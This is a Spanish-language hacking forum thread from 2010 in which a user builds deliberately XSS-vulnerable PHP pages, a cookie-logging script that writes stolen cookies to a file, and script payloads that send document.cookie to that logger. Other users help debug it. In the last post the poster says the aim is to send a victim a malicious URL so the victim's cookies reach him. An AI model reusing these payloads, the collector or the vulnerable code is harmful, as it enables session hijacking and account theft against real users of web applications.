duda xss

Iniciado por Dr [F], 24 Julio 2010, 08:55 AM

0 Miembros y 1 Visitante están viendo este tema.

Dr [F]

Hola gente del foro, estaba en casa intentando practicar xss leyendo tutoriales, pero no me sale :S

miren hize unas paginas vulnerables, pero me sigue sin salir:

pagina: pindex.php

<?php
if(isset($_COOKIE['user'])) echo $_COOKIE['user'];
?>

<html>
<head>
</head>
<body>
<form method="post" action="buscador.php">
<input type="text" name="palabrita">
<br>
<input type="submit" value="enviar"></form>
</body>
</html>


buscador.php

<?php
$user 
$_REQUEST['palabrita'];
setcookie("user"$usertime()+(60*60*24*365),"/");
?>

<html>
<head></head>
<body>
<a href="indexxx.php"> Pagina 1</a>
</body>
</html>


cookies.php

<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a");
fwrite($fff, $cookie);
fclose($fff);
?>


y esta es la url que mando:

http://localhost/buscador.php?palabrita=
<script>window.location='http://localhost/cookies.php?cookie='+document.cookie;</script>&enviar=;


el problema es que no me crea el archivo archivo.txt :S

alguien sabe a que se debe.. ? gracias
"Una vulnerabilidad es tan limitada como tu quieres que lo sea"

[H] Risk T --> Dr [F]

~ Yoya ~

aprende php, lo unico vulnerable es el pindex.php
Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.

Dr [F]

es que no se que estoy haciendo mal -.-"
"Una vulnerabilidad es tan limitada como tu quieres que lo sea"

[H] Risk T --> Dr [F]

~ Yoya ~

No es necesario enviar el valor como una Cookie...

Puede ser que el servidor tenga  la directiva magic_quotes_gpc On y te escape las comillas simples y dobles de los valores que se envian via Get, Post o Cookie...

Prueba con este
Código (php) [Seleccionar]
<?php
if(isset($_POST['palabrita'])){
setcookie("user"$_POST['palabrita']);
}

if(isset(
$_COOKIE['user'])){
echo 
$_COOKIE['user'];
exit;
}

?>


<html>
<head>
</head>
<body>
<form method="post">
<input type="text" name="palabrita">
<br>
<input type="submit" value="enviar"></form>
</body>
</html>
Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.

Dr [F]

sigue sin salirme, sinceramente no se que estoy haciendo mal :S  :-[
"Una vulnerabilidad es tan limitada como tu quieres que lo sea"

[H] Risk T --> Dr [F]

Erfiug

Que nevegador utilizas? Algunos como IE8 tienen protecciones anti XSS que no permiten acceder directamente a la variable document.cookie

Dr [F]

#6
sisi :) utilizo mozilla 3.6  miren me quede toda la noche ayer y logre obtener una fucking cookie..

les dejo los codigos :)

<?php
if(isset($_COOKIE['user'])) echo $_COOKIE['user'];
?>

<html>
<head>
</head>
<body>
<form method="post" action="buscador.php">
<input name="palabrita" type="text">
<br>
<input type="submit" value="enviar"></form>
<a
onclick="document.location='http://localhost/lalsa.php?cookie='+escape(document.cookie);" href="#"> Click here for details</a>
</body>
</html>



buscador.php
<?php
$user 
$_REQUEST['palabrita'];
setcookie("user"$usertime()+(60*60*24*365),"/");
echo 
$user;
?>

<html>
<head></head>
<body>
<a href="pindex.php"> Pagina 1</a>


lasla.php



<?php
$cookie 
$_GET['cookie'];
$archivo ="datos.txt";
$f fopen($archivo,"w");
fputs($f$cookie);
fclose ($f);
?>




el problema es el siguiente, yo quiero mandar una url a la victima y que sus cookies de esa pagina vulnerable se envien a mi, pero no se que url "maliciosa" mandar... me entienden ?

ya que si mando estO:

<script><a
onclick="document.location='http://localhost/lalsa.php?cookie='+escape(document.cookie);" href="#"> Volver a la pagina</a></script>


me guarda en la cookie lo siguiente:

token=8c610b4ae58115e366123efd8e7b7accd7ba525a2207acc6; u=fra; c=a1305ca10f94f2340770c73e26d427588f236709; user=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Flocalhost%2Flalsa.php%3Fcookie%3D%27 escape%28document.cookie%29%3B%3C%2Fscript%3E;

y ahi no me esta guardando ningun usuario solo lo que puse acontinuacion de la variable palabrita :s
muchas gracias
"Una vulnerabilidad es tan limitada como tu quieres que lo sea"

[H] Risk T --> Dr [F]